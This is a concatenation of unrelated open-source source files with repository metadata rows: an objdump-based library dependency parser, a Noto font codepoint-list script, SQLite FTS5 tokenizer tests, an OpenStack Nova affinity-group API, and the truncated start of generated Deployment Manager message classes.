'/path/to/my.data' ]
arch: The architecure we are looking for, or None to accept any
architecture.
objdump: Path to the objdump executable.
lib_path: A list of paths to search for shared libraries.
Returns: A tuple with the following members:
input_info: A dict with key=filename and value=architecture. The
architecture will be one of ('x86_32', 'x86_64', 'arm').
needed: A set of strings formatted as "arch/name". Example:
set(['x86-32/libc.so', 'x86-64/libgcc.so'])
'''
if not objdump:
raise NoObjdumpError('No objdump executable found!')
full_paths = set()
for filename in files:
if os.path.exists(filename):
full_paths.add(filename)
else:
for path in _FindLibsInPath(filename, lib_path):
full_paths.add(path)
cmd = [objdump, '-p'] + list(sorted(full_paths))
env = {'LANG': 'en_US.UTF-8'}
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=-1,
universal_newlines=True,
env=env)
input_info = {}
found_basenames = set()
needed = set()
output, err_output = proc.communicate()
if proc.returncode:
raise Error('%s\nStdError=%s\nobjdump failed with error code: %d' %
(output, err_output, proc.returncode))
file_arch = None
for line in output.splitlines(True):
# Objdump should display the architecture first and then the dependencies
# second for each file in the list.
matched = FormatMatcher.match(line)
if matched:
filename = matched.group(1)
file_arch = OBJDUMP_ARCH_MAP[matched.group(2)]
if arch and file_arch != arch:
continue
name = os.path.basename(filename)
found_basenames.add(name)
input_info[filename] = file_arch
matched = NeededMatcher.match(line)
if matched:
if arch and file_arch != arch:
continue
filename = matched.group(1)
new_needed = (filename, file_arch)
needed.add(new_needed)
for filename in files:
if os.path.basename(filename) not in found_basenames:
raise Error('Library not found [%s]: %s' % (arch, filename))
return input_info, needed
def _FindLibsInPath(name, lib_path):
'''Finds the set of libraries matching |name| within lib_path
Args:
name: name of library to find
lib_path: A list of paths to search for shared libraries.
Returns:
A list of system paths that match the given name within the lib_path'''
files = []
for dirname in lib_path:
# The libc.so files in the the glibc toolchain is actually a linker
# script which references libc.so.<SHA1>. This means the libc.so itself
# does not end up in the NEEDED section for glibc.
if name == 'libc.so':
continue
filename = os.path.join(dirname, name)
if os.path.exists(filename):
files.append(filename)
if not files:
raise Error('cannot find library %s' % name)
return files
def _GetNeededStatic(main_files):
needed = {}
for filename in main_files:
arch = elf.ParseElfHeader(filename)[0]
needed[filename] = arch
return needed
| bsd-3-clause | -5,328,695,073,726,777,000 | 29.008658 | 79 | 0.655366 | false |
dougfelt/nototools | nototools/gen_cplist.py | 2 | 3608 | #!/usr/bin/env python
#
# Copyright 2016 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Generate lists of codepoints prefixed with 'u' or 'uni' from cmap data file.
Occasionally the designers want data in this format to create lists of files
for their tools, so let's just save this script.
"""
import argparse
from os import path
import sys
from nototools import cmap_data
from nototools import tool_utils
def glyphstr(cp):
return ('uni%04x' % cp) if cp < 0x10000 else ('u%05x' % cp)
def glyphstrs(cps):
return '\n'.join(glyphstr(cp) for cp in sorted(cps))
def write_cp_list(cps, fname):
with open(fname, 'w') as f:
f.write(glyphstrs(cps))
f.write('\n')
def generate_single(cmapdata, script, outfile):
for row in cmapdata.table.rows:
if script == row.script:
cps = tool_utils.parse_int_ranges(row.ranges)
write_cp_list(cps, outfile)
print >> sys.stderr, 'wrote %s to %s' % (script, outfile)
return
raise ValueError('no script "%s" in cmap data' % script)
def generate(cmapdata, dst_dir, scripts, namepats):
if not scripts:
raise ValueError('no scripts')
if not namepats:
raise ValueError('no namepats')
if len(scripts) != len(namepats):
if len(namepats) != 1:
raise ValueError(
'Have %d script%s but %d namepats' %
(len(scripts), '' if len(scripts) == 1 else 's', len(namepats)))
if '%s' not in namepats[0] and len(scripts) > 1:
raise ValueError(
'Have multiple scripts but single namepat "%s" has no substitution'
% namepats[0])
namepats = [namepats[0]] * len(scripts)
dst_dir = tool_utils.ensure_dir_exists(dst_dir)
for s, n in zip(scripts, namepats):
outfile = path.join(dst_dir, (n % s) if '%s' in n else n)
generate_single(cmapdata, s, outfile)
def main():
default_cmap = '[tools]/nototools/data/noto_cmap_phase3.xml'
default_namepats = ['cps_%s.txt']
epilog = """If a namepat contains the string "%s" then the script id will
be substituted for it. If one namepat is provided it is used for all scripts,
otherwise there should be as many namepats as there are scripts."""
parser = argparse.ArgumentParser(epilog=epilog)
parser.add_argument(
'-c', '--cmap_file', help='cmap data file to use (default %s)' %
default_cmap, default=default_cmap, metavar='file')
parser.add_argument(
'-d', '--dest_dir', help='directory for output, (defaults to current '
'directory)', metavar='dir', default='.')
parser.add_argument(
'-s', '--scripts', help='script ids of data to output', nargs='+',
metavar='id', required=True)
parser.add_argument(
'-n', '--namepats', help='name patterns used to generate output '
'filenames (default "cps_%%s.txt")',
default=default_namepats, metavar='npat', nargs='+')
args = parser.parse_args()
cmap_filepath = tool_utils.resolve_path(args.cmap_file)
cmapdata = cmap_data.read_cmap_data_file(cmap_filepath)
generate(cmapdata, args.dest_dir, args.scripts, args.namepats)
if __name__ == '__main__':
main()
| apache-2.0 | 8,612,731,639,528,319,000 | 31.8 | 79 | 0.674612 | false |
hideaki-t/sqlite-fts-python | tests/test_fts5.py | 1 | 12135 | # coding: utf-8
from __future__ import print_function, unicode_literals
import sqlite3
import re
from collections import Counter
from sqlitefts import fts5, fts5_aux
import pytest
from cffi import FFI
ffi = FFI()
class SimpleTokenizer(fts5.FTS5Tokenizer):
_p = re.compile(r'\w+', re.UNICODE)
def tokenize(self, text, flags):
for m in self._p.finditer(text):
s, e = m.span()
t = text[s:e]
l = len(t.encode('utf-8'))
p = len(text[:s].encode('utf-8'))
yield t, p, p + l
@pytest.fixture
def c():
c = sqlite3.connect(':memory:')
c.row_factory = sqlite3.Row
return c
@pytest.fixture
def tm():
return fts5.make_fts5_tokenizer(SimpleTokenizer())
def test_fts5_api_from_db(c):
fts5api = fts5.fts5_api_from_db(c)
assert fts5api.iVersion == 2
assert fts5api.xCreateTokenizer
c.close()
def test_make_tokenizer(c):
tm = fts5.make_fts5_tokenizer(SimpleTokenizer())
assert all(
getattr(tm, x) is not None
for x in ('xCreate', 'xDelete', 'xTokenize'))
c.close()
def test_make_tokenizer_by_class(c):
tm = fts5.make_fts5_tokenizer(SimpleTokenizer)
assert all(
getattr(tm, x) is not None
for x in ('xCreate', 'xDelete', 'xTokenize'))
c.close()
def test_register_tokenizer(c, tm):
name = 'super_simple'
assert fts5.register_tokenizer(c, name, tm)
c.close()
def test_register_tokenizer_with_destroy(c, tm):
name = 'super_simple'
arg_on_destroy = []
context = "hello"
def on_destroy(x):
arg_on_destroy.append(x)
assert fts5.register_tokenizer(
c, name, tm, context=context, on_destroy=on_destroy)
c.close()
assert arg_on_destroy == [context]
def test_createtable(c, tm):
name = 'super_simple'
sql = "CREATE VIRTUAL TABLE fts USING fts5(w, tokenize={})".format(name)
fts5.register_tokenizer(c, name, tm)
c.execute(sql)
r = c.execute(
"SELECT * FROM sqlite_master WHERE type='table' AND name='fts'").fetchone(
)
assert r
assert r[str('type')] == 'table' and r[str('name')] == 'fts' and r[str(
'tbl_name')] == 'fts'
assert r[str('sql')].upper() == sql.upper()
c.close()
def test_createtale_using_tokenizer_class(c):
initialized = {}
deleted = Counter()
class ST(SimpleTokenizer):
def __init__(self, context=None, args=None):
initialized[self] = (context, tuple(args))
def on_delete(self):
deleted[self] += 1
name = 'super_simple'
fts5.register_tokenizer(
c, name, fts5.make_fts5_tokenizer(ST), context='test')
sql = (
"CREATE VIRTUAL TABLE fts "
"USING FTS5(content, tokenize='{} {} {}')").format(name, 'arg', '引数')
c.execute(sql)
assert len(initialized) == 1
assert list(initialized.values()) == [('test', ('arg', '引数'))]
assert len(deleted) == 0
sql = (
"CREATE VIRTUAL TABLE fts_2 "
"USING FTS5(content, tokenize='{} {} {}')").format(name, 'arg2', '引数2')
c.execute(sql)
c.close()
assert set(initialized.values()) == {('test', ('arg', '引数')),
('test', ('arg2', '引数2'))}
assert list(x for x in deleted.values()) == [1, 1]
def test_insert(c, tm):
name = 'super_simple'
content = 'これは日本語で書かれています'
fts5.register_tokenizer(c, name, tm)
c.execute("CREATE VIRTUAL TABLE fts USING FTS5(content, tokenize={})".
format(name))
r = c.execute('INSERT INTO fts VALUES(?)', (content, ))
assert r.rowcount == 1
r = c.execute("SELECT * FROM fts").fetchone()
assert r
assert r[str('content')] == content
c.close()
def test_match(c, tm):
name = 'super_simple'
contents = [('abc def', ), ('abc xyz', ), ('あいうえお かきくけこ', ),
('あいうえお らりるれろ', )]
fts5.register_tokenizer(c, name, tm)
c.execute("CREATE VIRTUAL TABLE fts USING FTS5(content, tokenize={})".
format(name))
r = c.executemany('INSERT INTO fts VALUES(?)', contents)
assert r.rowcount == 4
r = c.execute("SELECT * FROM fts").fetchall()
assert len(r) == 4
r = c.execute("SELECT * FROM fts WHERE fts MATCH 'abc'").fetchall()
assert len(r) == 2
r = c.execute("SELECT * FROM fts WHERE fts MATCH 'def'").fetchall()
assert len(r) == 1 and r[0][str('content')] == contents[0][0]
r = c.execute("SELECT * FROM fts WHERE fts MATCH 'xyz'").fetchall()
assert len(r) == 1 and r[0][str('content')] == contents[1][0]
r = c.execute("SELECT * FROM fts WHERE fts MATCH 'zzz'").fetchall()
assert len(r) == 0
r = c.execute("SELECT * FROM fts WHERE fts MATCH 'あいうえお'").fetchall()
assert len(r) == 2
r = c.execute("SELECT * FROM fts WHERE fts MATCH 'かきくけこ'").fetchall()
assert len(r) == 1 and r[0][str('content')] == contents[2][0]
r = c.execute("SELECT * FROM fts WHERE fts MATCH 'らりるれろ'").fetchall()
assert len(r) == 1 and r[0][str('content')] == contents[3][0]
r = c.execute("SELECT * FROM fts WHERE fts MATCH 'まみむめも'").fetchall()
assert len(r) == 0
c.close()
def test_full_text_index_queries(c, tm):
name = 'super_simple'
docs = [(
'README',
'sqlitefts-python provides binding for tokenizer of SQLite Full-Text search(FTS3/4). It allows you to write tokenizers in Python.'
), ('LICENSE',
'''Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:'''),
('日本語', 'あいうえお かきくけこ さしすせそ たちつてと なにぬねの')]
with c:
fts5.register_tokenizer(c, name, tm)
c.execute(
"CREATE VIRTUAL TABLE docs USING FTS5(title, body, tokenize={})".
format(name))
c.executemany("INSERT INTO docs(title, body) VALUES(?, ?)", docs)
r = c.execute("SELECT * FROM docs WHERE docs MATCH 'Python'").fetchall(
)
assert len(r) == 1
r = c.execute("SELECT * FROM docs WHERE docs MATCH 'bind'").fetchall()
assert len(r) == 0
r = c.execute(
"SELECT * FROM docs WHERE docs MATCH 'binding'").fetchall()
assert len(r) == 1
r = c.execute("SELECT * FROM docs WHERE docs MATCH 'to'").fetchall()
assert len(r) == 2
r = c.execute("SELECT * FROM docs WHERE docs MATCH 'あいうえお'").fetchall()
assert len(r) == 1
r = c.execute("SELECT * FROM docs WHERE docs MATCH 'らりるれろ'").fetchall()
assert len(r) == 0
assert (c.execute(
"SELECT * FROM docs WHERE docs MATCH 'binding'").fetchall()[0] ==
c.execute("SELECT * FROM docs WHERE docs MATCH 'body:binding'")
.fetchall()[0])
assert (c.execute("SELECT * FROM docs WHERE docs MATCH 'body:binding'")
.fetchall()[0] ==
c.execute("SELECT * FROM docs WHERE docs MATCH 'body:binding'")
.fetchall()[0])
assert (c.execute(
"SELECT * FROM docs WHERE docs MATCH 'あいうえお'").fetchall()[0] ==
c.execute("SELECT * FROM docs WHERE docs MATCH 'body:あいうえお'")
.fetchall()[0])
r = c.execute(
"SELECT * FROM docs WHERE docs MATCH 'title:bind'").fetchall()
assert len(r) == 0
r = c.execute(
"SELECT * FROM docs WHERE docs MATCH 'title:README'").fetchall()
assert len(r) == 1
r = c.execute(
"SELECT * FROM docs WHERE docs MATCH 'title:日本語'").fetchall()
assert len(r) == 1
r = c.execute("SELECT * FROM docs WHERE docs MATCH 'to in'").fetchall()
assert len(r) == 2
r = c.execute("SELECT * FROM docs WHERE docs MATCH 'Py*'").fetchall()
assert len(r) == 1
r = c.execute("SELECT * FROM docs WHERE docs MATCH 'Z*'").fetchall()
assert len(r) == 0
r = c.execute("SELECT * FROM docs WHERE docs MATCH 'あ*'").fetchall()
assert len(r) == 1
r = c.execute("SELECT * FROM docs WHERE docs MATCH 'ん*'").fetchall()
assert len(r) == 0
r = c.execute(
"SELECT * FROM docs WHERE docs MATCH 'tokenizer SQLite'").fetchall(
)
assert len(r) == 1
r = c.execute(
"SELECT * FROM docs WHERE docs MATCH '\"tokenizer SQLite\"'").fetchall(
)
assert len(r) == 0
r = c.execute(
"SELECT * FROM docs WHERE docs MATCH 'あいうえお たちつてと'").fetchall()
assert len(r) == 1
r = c.execute(
"SELECT * FROM docs WHERE docs MATCH '\"あいうえお たちつてと\"'").fetchall()
assert len(r) == 0
r = c.execute(
"SELECT * FROM docs WHERE docs MATCH 'tok* + SQL*'").fetchall()
assert len(r) == 0
r = c.execute(
"SELECT * FROM docs WHERE docs MATCH 'tok* of SQL*'").fetchall()
assert len(r) == 1
r = c.execute(
"SELECT * FROM docs WHERE docs MATCH 'あ* + さ*'").fetchall()
assert len(r) == 0
r = c.execute(
"SELECT * FROM docs WHERE docs MATCH 'あ* かきくけこ さ*'").fetchall()
assert len(r) == 1
r = c.execute(
"SELECT * FROM docs WHERE docs MATCH 'NEAR(tokenizer SQLite)'").fetchall(
)
assert len(r) == 1
r = c.execute(
"SELECT * FROM docs WHERE docs MATCH 'NEAR(binding SQLite, 2)'").fetchall(
)
assert len(r) == 0
r = c.execute(
"SELECT * FROM docs WHERE docs MATCH 'NEAR(binding SQLite, 3)'").fetchall(
)
assert len(r) == 1
r = c.execute(
"SELECT * FROM docs WHERE docs MATCH 'NEAR(あいうえお たちつてと)'").fetchall(
)
assert len(r) == 1
r = c.execute(
"SELECT * FROM docs WHERE docs MATCH 'NEAR(あいうえお たちつてと, 2)'").fetchall(
)
assert len(r) == 1
r = c.execute(
"SELECT * FROM docs WHERE docs MATCH 'NEAR(あいうえお たちつてと, 3)'").fetchall(
)
assert len(r) == 1
def test_flags(c):
flags_counter = Counter()
class ST(SimpleTokenizer):
def tokenize(self, text, flags):
flags_counter[flags] += 1
return super(ST, self).tokenize(text, flags)
name = 'super_simple2'
fts5.register_tokenizer(c, name, fts5.make_fts5_tokenizer(ST()))
sql = ("CREATE VIRTUAL TABLE fts "
"USING FTS5(content, tokenize='{}')").format(name)
c.execute(sql)
c.executemany('INSERT INTO fts VALUES(?)',
[('abc def', ), ('abc xyz', ), ('あいうえお かきくけこ', ),
('あいうえお らりるれろ', )])
c.execute("SELECT * FROM fts WHERE fts MATCH 'abc'").fetchall()
c.execute("SELECT * FROM fts WHERE fts MATCH 'abc'").fetchall()
c.close()
assert flags_counter[fts5.FTS5_TOKENIZE_DOCUMENT] == 4
assert flags_counter[fts5.FTS5_TOKENIZE_QUERY] == 2
def test_aux_and_tokenize(c, tm):
name = 'super_simple'
fts5.register_tokenizer(c, name, tm)
fts5_aux.register_aux_function(c, 'tokenize', fts5_aux.aux_tokenize)
c.execute("CREATE VIRTUAL TABLE fts USING FTS5(content, tokenize={})".
format(name))
r = c.executemany('INSERT INTO fts VALUES(?)',
(['hello world'], ['こんにちは 世界']))
assert r.rowcount == 2
r = c.execute('SELECT tokenize(fts, 0) FROM fts')
assert [x[0] for x in r.fetchall()] == ['hello, world', 'こんにちは, 世界']
c.close()
| mit | -4,572,678,191,763,336,700 | 35.26935 | 138 | 0.571148 | false |
nash-x/hws | nova/huawei/compute/affinity_api.py | 1 | 10643 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Piston Cloud Computing, Inc.
# Copyright 2012-2013 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Handles all requests relating to compute resources (e.g. guest VMs,
networking and storage of VMs, and compute hosts on which they run)."""
from nova.db import base
from nova import exception
from nova.huawei import exception as huawei_exception
from nova.compute import api as core_api
from nova.huawei.compute import rpcapi as affinity_rpcapi
from nova.huawei.objects import affinity_group as affinitygroup_obj
from nova.openstack.common.gettextutils import _
from nova.openstack.common import log as logging
LOG = logging.getLogger(__name__)
class AffinityGroupAPI(base.Base):
"""Sub-set of the Compute Manager API for managing affinity group."""
def __init__(self, **kwargs):
self.compute_rpcapi = affinity_rpcapi.HuaweiComputeAPI()
self.compute_api = core_api.API()
super(AffinityGroupAPI, self).__init__(**kwargs)
def create_affinity_group(self, context, affinity_name, description, type,
metadata):
"""Creates the model for the affinity group."""
affinitygroup = affinitygroup_obj.AffinityGroup()
affinitygroup.name = affinity_name
affinitygroup.description = description
affinitygroup.type = type
affinitygroup.metadata = metadata
affinitygroup.create(context)
affinitygroup = self._reformat_affinitygroup_info(affinitygroup)
return affinitygroup
def get_affinity_group_list(self, context):
"""Get all the affinity_group_list."""
affinitygroups = affinitygroup_obj.AffinityGroupList.get_all(context)
vm_id = None
affinity_group = None
for affinitygroup in affinitygroups:
affinity_group = affinitygroup
for vm_id_temp in affinitygroup.vms:
try:
vm_id = vm_id_temp
self.compute_api.get(context, vm_id_temp, want_objects=True)
except exception.InstanceNotFound:
affinity_group.delete_vm(context, str(vm_id))
return [self._reformat_affinitygroup_info(element) for element in
affinitygroups]
def _reformat_affinitygroup_info(self, affinitygroup):
"""Builds a dictionary with aggregate props, metadata and hosts."""
return dict(affinitygroup.iteritems())
## delete affinitygroup by id
def delete_affinity_group(self, context, affinitygroup_id):
"""Delete affinity group by affinitygroup_id"""
affinitygroup = affinitygroup_obj.AffinityGroup()
affinitygroup.id = affinitygroup_id
affinitygroup = affinitygroup_obj.AffinityGroup.get_by_id(context,
affinitygroup_id)
action_name = "delete"
if (affinitygroup.vms is not None) and (affinitygroup.vms != []):
msg = ("Can't delete affinity group with instances in it",
affinitygroup.vms)
raise huawei_exception.InvalidAffinityGroupAction(
action=action_name, affinitygroup_id=affinitygroup_id,
reason=msg)
affinitygroup.destroy(context)
def update_affinitygroup(self, context, affinitygroup_id, values):
"""Update the properties of given affinity group."""
affinitygroup = affinitygroup_obj.AffinityGroup.get_by_id(context,
affinitygroup_id)
if 'name' in values:
affinitygroup.name = values.pop('name')
if 'description' in values:
affinitygroup.description = values.pop('description')
if "metadata" in values:
affinitygroup.metadata = values.pop('metadata')
affinitygroup.save()
return self._reformat_affinitygroup_info(affinitygroup)
def get_affinitygroup(self, context, affinitygroup_id):
"""get the details of an affinitygroup by the given affinitygroup_id"""
affinitygroup = affinitygroup_obj.AffinityGroup.get_by_id(context,
affinitygroup_id)
vm_id = None
for vm_id_temp in affinitygroup.vms:
try:
vm_id = vm_id_temp
self.compute_api.get(context, vm_id_temp, want_objects=True)
except exception.InstanceNotFound:
affinitygroup.delete_vm(context, str(vm_id))
showinfo = self._reformat_affinitygroup_info(affinitygroup)
# get the detailed infomation about the vms
instance_ids = affinitygroup.vms
if instance_ids:
vmsinfo = {}
for instance_id in instance_ids:
instance = self.compute_api.get(context, instance_id)
vmsinfo[instance_id] = instance
showinfo['vmsinfo'] = vmsinfo
return showinfo
def _check_vms_in_affinity_group(self, context, vm_list,
affinity_group_id):
for vm in vm_list:
try:
affinitygroup = affinitygroup_obj.AffinityGroup.get_by_vm_id(
context, str(vm['id']))
except huawei_exception.AffinityGroupNotFound:
continue
if affinitygroup:
LOG.debug(_("instance %s has been added to a affinity "
"group %s") %(vm['uuid'], affinitygroup.name))
action_name = "add vms to affinitygroup"
msg = "instance has been added to a affinity group"
raise huawei_exception.InvalidAffinityGroupAction(
action=action_name, affinitygroup_id=str(affinity_group_id),
reason=msg)
def add_vms_to_affinity_group(self, context, affinity_group_id, vm_list):
affinitygroup = affinitygroup_obj.AffinityGroup.get_by_id(context,
affinity_group_id)
availability_zone = affinitygroup.availability_zone
self._check_vms_in_affinity_group(context, vm_list, affinity_group_id)
if availability_zone:
for vm in vm_list:
cluster_temp = vm['node'].split('(')
cluster_temp = cluster_temp[1].split(')')
cluster = cluster_temp[0]
if availability_zone != cluster:
LOG.debug(_("affinity availability_zone %s, "
"is not same with %s") %(availability_zone, cluster))
action_name = "add vms to affinitygroup"
msg = "affinity availability_zone is not same with vm"
raise huawei_exception.InvalidAffinityGroupAction(
action=action_name, affinitygroup_id=affinity_group_id,
reason=msg)
self.compute_rpcapi.add_vms_to_affinity_group(context,
affinity_group_id,
vm_list)
else:
vm_zone = vm_list[0]['node']
for vm in vm_list:
if vm_zone != vm['node']:
LOG.debug(_("vm is not same with a availability_zone"))
action_name = "add vms to affinitygroup"
msg = "vm is not same with a availability_zone"
raise huawei_exception.InvalidAffinityGroupAction(
action=action_name, affinitygroup_id=affinity_group_id,
reason=msg)
self.compute_rpcapi.add_vms_to_affinity_group(context,
affinity_group_id,
vm_list)
def remove_vms_from_affinity_group(self, context, affinity_group_id,
vm_list):
affinitygroup = affinitygroup_obj.AffinityGroup.get_by_id(context,
affinity_group_id)
availability_zone = affinitygroup.availability_zone
if availability_zone:
for vm in vm_list:
cluster_temp = vm['node'].split('(')
cluster_temp = cluster_temp[1].split(')')
cluster = cluster_temp[0]
if availability_zone != cluster:
LOG.debug(_("affinity availability_zone %s, "
"is not same with %s") %(availability_zone, cluster))
action_name = "add vms to affinitygroup"
msg = "affinity availability_zone is not same with vm"
raise huawei_exception.InvalidAffinityGroupAction(
action=action_name, affinitygroup_id=affinity_group_id,
reason=msg)
self.compute_rpcapi.remove_vms_from_affinity_group(context,
affinity_group_id, vm_list)
else:
vm_zone = vm_list[0]['node']
for vm in vm_list:
if vm_zone != vm['node']:
LOG.debug(_("vm is not same with a availability_zone"))
action_name = "add vms to affinitygroup"
msg = "vm is not same with a availability_zone"
raise huawei_exception.InvalidAffinityGroupAction(
action=action_name, affinitygroup_id=affinity_group_id,
reason=msg)
self.compute_rpcapi.remove_vms_from_affinity_group(context,
affinity_group_id,
vm_list)
| apache-2.0 | 6,548,163,418,314,135,000 | 48.273148 | 85 | 0.569764 | false |
Sorsly/subtle | google-cloud-sdk/lib/googlecloudsdk/third_party/apis/deploymentmanager/alpha/deploymentmanager_alpha_messages.py | 1 | 83769 | """Generated message classes for deploymentmanager version alpha.
The Deployment Manager API allows users to declaratively configure, deploy and
run complex solutions on the Google Cloud Platform.
"""
# NOTE: This file is autogenerated and should not be edited by hand.
from apitools.base.protorpclite import messages as _messages
package = 'deploymentmanager'
class AuditConfig(_messages.Message):
"""Specifies the audit configuration for a service. It consists of which
permission types are logged, and what identities, if any, are exempted from
logging. An AuditConifg must have one or more AuditLogConfigs.
Fields:
auditLogConfigs: The configuration for logging of each type of permission.
exemptedMembers: Specifies the identities that are exempted from "data
access" audit logging for the `service` specified above. Follows the
same format of Binding.members. This field is deprecated in favor of
per-permission-type exemptions.
service: Specifies a service that will be enabled for audit logging. For
example, `resourcemanager`, `storage`, `compute`. `allServices` is a
special value that covers all services.
"""
auditLogConfigs = _messages.MessageField('AuditLogConfig', 1, repeated=True)
exemptedMembers = _messages.StringField(2, repeated=True)
service = _messages.StringField(3)
class AuditLogConfig(_messages.Message):
"""Provides the configuration for logging a type of permissions. Example: {
"audit_log_configs": [ { "log_type": "DATA_READ", "exempted_members": [
"user:[email protected]" ] }, { "log_type": "DATA_WRITE", } ] } This enables
'DATA_READ' and 'DATA_WRITE' logging, while exempting [email protected] from
DATA_READ logging.
Fields:
exemptedMembers: Specifies the identities that do not cause logging for
this type of permission. Follows the same format of [Binding.members][].
logType: The log type that this config enables.
"""
exemptedMembers = _messages.StringField(1, repeated=True)
logType = _messages.StringField(2)
class BasicAuth(_messages.Message):
"""Basic Auth used as a credential.
Fields:
password: A string attribute.
user: A string attribute.
"""
password = _messages.StringField(1)
user = _messages.StringField(2)
class Binding(_messages.Message):
"""Associates `members` with a `role`.
Fields:
members: Specifies the identities requesting access for a Cloud Platform
resource. `members` can have the following values: * `allUsers`: A
special identifier that represents anyone who is on the internet; with
or without a Google account. * `allAuthenticatedUsers`: A special
identifier that represents anyone who is authenticated with a Google
account or a service account. * `user:{emailid}`: An email address that
represents a specific Google account. For example, `[email protected]` or
`[email protected]`. * `serviceAccount:{emailid}`: An email address
that represents a service account. For example, `my-other-
[email protected]`. * `group:{emailid}`: An email address
that represents a Google group. For example, `[email protected]`. *
`domain:{domain}`: A Google Apps domain name that represents all the
users of that domain. For example, `google.com` or `example.com`.
role: Role that is assigned to `members`. For example, `roles/viewer`,
`roles/editor`, or `roles/owner`.
"""
members = _messages.StringField(1, repeated=True)
role = _messages.StringField(2)
class CollectionOverride(_messages.Message):
"""CollectionOverride allows resource handling overrides for specific
resources within a BaseType
Fields:
collection: The collection that identifies this resource within its
service.
options: The options to apply to this resource-level override
"""
collection = _messages.StringField(1)
options = _messages.MessageField('Options', 2)
class CompositeType(_messages.Message):
"""Holds the composite type.
Fields:
description: An optional textual description of the resource; provided by
the client when the resource is created.
id: [Output Only] Unique identifier for the resource; defined by the
server.
insertTime: [Output Only] Timestamp when the composite type was created,
in RFC3339 text format.
labels: Map of labels; provided by the client when the resource is created
or updated. Specifically: Label keys must be between 1 and 63 characters
long and must conform to the following regular expression:
[a-z]([-a-z0-9]*[a-z0-9])? Label values must be between 0 and 63
characters long and must conform to the regular expression
([a-z]([-a-z0-9]*[a-z0-9])?)?
name: Name of the composite type.
operation: [Output Only] The Operation that most recently ran, or is
currently running, on this composite type.
selfLink: [Output Only] Self link for the type provider.
status: A string attribute.
templateContents: Files for the template type.
"""
description = _messages.StringField(1)
id = _messages.IntegerField(2, variant=_messages.Variant.UINT64)
insertTime = _messages.StringField(3)
labels = _messages.MessageField('CompositeTypeLabelEntry', 4, repeated=True)
name = _messages.StringField(5)
operation = _messages.MessageField('Operation', 6)
selfLink = _messages.StringField(7)
status = _messages.StringField(8)
templateContents = _messages.MessageField('TemplateContents', 9)
class CompositeTypeLabelEntry(_messages.Message):
"""A CompositeTypeLabelEntry object.
Fields:
key: A string attribute.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
class CompositeTypesListResponse(_messages.Message):
"""A response that returns all Composite Types supported by Deployment
Manager
Fields:
compositeTypes: [Output Only] A list of resource composite types supported
by Deployment Manager.
nextPageToken: A token used to continue a truncated list request.
"""
compositeTypes = _messages.MessageField('CompositeType', 1, repeated=True)
nextPageToken = _messages.StringField(2)
class Condition(_messages.Message):
"""A condition to be met.
Fields:
iam: Trusted attributes supplied by the IAM system.
op: An operator to apply the subject with.
svc: Trusted attributes discharged by the service.
sys: Trusted attributes supplied by any service that owns resources and
uses the IAM system for access control.
value: DEPRECATED. Use 'values' instead.
values: The objects of the condition. This is mutually exclusive with
'value'.
"""
iam = _messages.StringField(1)
op = _messages.StringField(2)
svc = _messages.StringField(3)
sys = _messages.StringField(4)
value = _messages.StringField(5)
values = _messages.StringField(6, repeated=True)
class ConfigFile(_messages.Message):
"""ConfigFile message type.
Fields:
content: The contents of the file.
"""
content = _messages.StringField(1)
class ConfigurableService(_messages.Message):
"""BaseType that describes a service-backed Type.
Fields:
collectionOverrides: Allows resource handling overrides for specific
collections
credential: Credential used when interacting with this type.
descriptorUrl: Descriptor Url for the this type.
options: Options to apply when handling any resources in this service.
"""
collectionOverrides = _messages.MessageField('CollectionOverride', 1, repeated=True)
credential = _messages.MessageField('Credential', 2)
descriptorUrl = _messages.StringField(3)
options = _messages.MessageField('Options', 4)
class Credential(_messages.Message):
"""Credential used by ConfigurableResourceTypes.
Fields:
basicAuth: Basic Auth Credentials for this Type.
"""
basicAuth = _messages.MessageField('BasicAuth', 1)
class Deployment(_messages.Message):
"""Deployment message type.
Fields:
description: An optional user-provided description of the deployment.
fingerprint: Provides a fingerprint to use in requests to modify a
deployment, such as update(), stop(), and cancelPreview() requests. A
fingerprint is a randomly generated value that must be provided with
update(), stop(), and cancelPreview() requests to perform optimistic
locking. This ensures optimistic concurrency so that only one request
happens at a time. The fingerprint is initially generated by Deployment
Manager and changes after every request to modify data. To get the
latest fingerprint value, perform a get() request to a deployment.
id: [Output Only] Unique identifier for the resource; defined by the
server.
insertTime: [Output Only] Timestamp when the deployment was created, in
RFC3339 text format .
labels: Map of labels; provided by the client when the resource is created
or updated. Specifically: Label keys must be between 1 and 63 characters
long and must conform to the following regular expression:
[a-z]([-a-z0-9]*[a-z0-9])? Label values must be between 0 and 63
characters long and must conform to the regular expression
([a-z]([-a-z0-9]*[a-z0-9])?)?
manifest: [Output Only] URL of the manifest representing the last manifest
that was successfully deployed.
name: Name of the resource; provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with RFC1035.
Specifically, the name must be 1-63 characters long and match the
regular expression [a-z]([-a-z0-9]*[a-z0-9])? which means the first
character must be a lowercase letter, and all following characters must
be a dash, lowercase letter, or digit, except the last character, which
cannot be a dash.
operation: [Output Only] The Operation that most recently ran, or is
currently running, on this deployment.
selfLink: [Output Only] Self link for the deployment.
target: [Input Only] The parameters that define your deployment, including
the deployment configuration and relevant templates.
